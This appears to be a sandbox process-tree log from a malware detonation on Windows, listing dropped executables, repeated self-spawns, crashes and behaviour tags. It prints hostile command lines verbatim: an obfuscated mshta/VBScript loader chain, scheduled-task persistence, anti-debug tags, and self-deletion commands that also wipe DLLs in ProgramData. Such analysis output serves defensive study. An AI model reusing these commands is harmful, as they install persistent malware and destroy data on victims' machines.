C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18024
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:1788
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20224
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16752
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:21304
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10024
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:21120
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10864
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20912
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12216
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15572
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13488
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15248
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20768
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20420
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16752
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19324
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20060
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:15092
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:21448
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17692
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:10772
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20668
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4872
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20644
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9024
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9540
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17324
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:3148
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9800
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:19508
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:5444
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:3572
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4116
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12784
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:14408
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12500
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:18664
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4248
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9320
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:21100
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:16204
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12524
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:4824
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13208
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:12832
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:17028
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:13512
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:9744
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:20172
-
-
C:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exeC:\Users\Admin\Documents\2HMgOT_jSZqsSbYiWn8DQHEr.exe3⤵PID:11760
-
-
-
C:\Users\Admin\Documents\FX6pHdGjUB080hks8a5CkPlS.exe"C:\Users\Admin\Documents\FX6pHdGjUB080hks8a5CkPlS.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2272
-
-
C:\Users\Admin\Documents\5_N5QOwcNDsgVJGkLgHZiD74.exe"C:\Users\Admin\Documents\5_N5QOwcNDsgVJGkLgHZiD74.exe"2⤵
- Executes dropped EXE
PID:2920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 4003⤵
- Program crash
PID:5752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 6203⤵
- Program crash
PID:5764
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 6723⤵
- Program crash
PID:7416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 6723⤵
- Program crash
PID:7712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 7043⤵
- Program crash
PID:7860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 7123⤵
- Program crash
PID:7456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 7803⤵
- Program crash
PID:13088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 7563⤵
- Program crash
PID:13988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 8563⤵PID:5136
-
-
-
C:\Users\Admin\Documents\YVqlGCkYGugXx1JCqoqvJbeD.exe"C:\Users\Admin\Documents\YVqlGCkYGugXx1JCqoqvJbeD.exe"2⤵
- Executes dropped EXE
PID:3808 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 6563⤵
- Program crash
PID:5500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 7043⤵
- Program crash
PID:5808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 7003⤵
- Program crash
PID:3620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 6363⤵
- Program crash
PID:5676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 9163⤵
- Program crash
PID:7088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 11363⤵
- Program crash
PID:7056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 11283⤵
- Program crash
PID:5840
-
-
-
C:\Users\Admin\Documents\whVPy7FlLWde_oujxKbnepxf.exe"C:\Users\Admin\Documents\whVPy7FlLWde_oujxKbnepxf.exe"2⤵
- Executes dropped EXE
PID:212 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\whVPy7FlLWde_oujxKbnepxf.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\whVPy7FlLWde_oujxKbnepxf.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )3⤵PID:6012
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\whVPy7FlLWde_oujxKbnepxf.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\whVPy7FlLWde_oujxKbnepxf.exe" ) do taskkill -F /Im "%~nXN"4⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exEKRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG5⤵PID:8516
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )6⤵PID:7568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"7⤵PID:12212
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\p_ZPP.J p6⤵PID:11468
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /Im "whVPy7FlLWde_oujxKbnepxf.exe"5⤵
- Kills process with taskkill
PID:8972
-
-
-
-
-
C:\Users\Admin\Documents\2YsYgyQ8WjW67NVR0HqPVr_5.exe"C:\Users\Admin\Documents\2YsYgyQ8WjW67NVR0HqPVr_5.exe"2⤵
- Executes dropped EXE
PID:428 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3488
-
-
-
C:\Users\Admin\Documents\DSffqnuQ35FG1J43cdDR5UeV.exe"C:\Users\Admin\Documents\DSffqnuQ35FG1J43cdDR5UeV.exe"2⤵
- Executes dropped EXE
PID:3812 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im DSffqnuQ35FG1J43cdDR5UeV.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\DSffqnuQ35FG1J43cdDR5UeV.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5876
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im DSffqnuQ35FG1J43cdDR5UeV.exe /f4⤵
- Kills process with taskkill
PID:3596
-
-
-
-
C:\Users\Admin\Documents\tTeqaVlIRlc_hhKtOTehgzOE.exe"C:\Users\Admin\Documents\tTeqaVlIRlc_hhKtOTehgzOE.exe"2⤵
- Executes dropped EXE
PID:1568 -
C:\Users\Admin\Documents\tTeqaVlIRlc_hhKtOTehgzOE.exe"C:\Users\Admin\Documents\tTeqaVlIRlc_hhKtOTehgzOE.exe"3⤵PID:5164
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im tTeqaVlIRlc_hhKtOTehgzOE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\tTeqaVlIRlc_hhKtOTehgzOE.exe" & del C:\ProgramData\*.dll & exit4⤵PID:7900
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tTeqaVlIRlc_hhKtOTehgzOE.exe /f5⤵
- Kills process with taskkill
PID:2324
-
-
-
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe"C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe"2⤵
- Executes dropped EXE
PID:188 -
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4660
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4780
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4988
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4376
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4804
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:2200
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4452
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4724
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:3720
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4112
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5464
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5792
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:6140
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5488
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5196
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5572
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:3440
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:6052
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:6440
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:6976
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:6784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6784 -s 244⤵
- Program crash
PID:6948
-
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5320
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5044
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7116
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7240
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7592
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7940
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7388
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7748
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7464
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 244⤵
- Program crash
PID:4712
-
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4672
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:5356
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:7696
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:8488
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:8892
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:8200
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:8900
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4492
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9132
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:8444
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4356
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9108
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9396
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9772
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:10116
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:8868
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9920
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9436
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9916
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4688
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:2464
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:4688
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:10420
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:10960
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:10256
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:11208
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9212
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:10356
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:6740
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:3024
-
-
C:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exeC:\Users\Admin\Documents\2AkiF393TVUOviqMKz1H9gXm.exe3⤵PID:9124
-
-
